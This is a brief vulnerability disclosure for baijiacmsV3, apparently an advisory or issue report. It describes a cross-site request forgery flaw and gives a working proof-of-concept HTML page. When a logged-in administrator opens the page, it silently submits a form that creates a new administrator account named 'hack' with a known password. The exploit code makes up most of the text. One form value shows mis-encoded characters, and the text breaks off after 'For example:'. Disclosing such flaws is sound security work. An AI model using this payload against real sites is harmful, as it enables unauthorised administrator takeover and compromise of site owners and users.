baijiacmsV3 CSRF add admin

baijiacmsV3 CSRF add admin

There is a CSRF vulnerability that can add the administrator account
After the administrator logged in,open the following one page.

POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/baijiacmsV3-master/index.php?mod=site&op=edituser&name=manager&do=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="username" value="hack" />
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="store" value="0" />
      <input type="hidden" name="newpassword" value="123123" />
      <input type="hidden" name="confirmpassword" value="123123" />
      <input type="hidden" name="submit" value="&#32;�&#143;&#144;&#32;浜&#164;&#32;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

For example: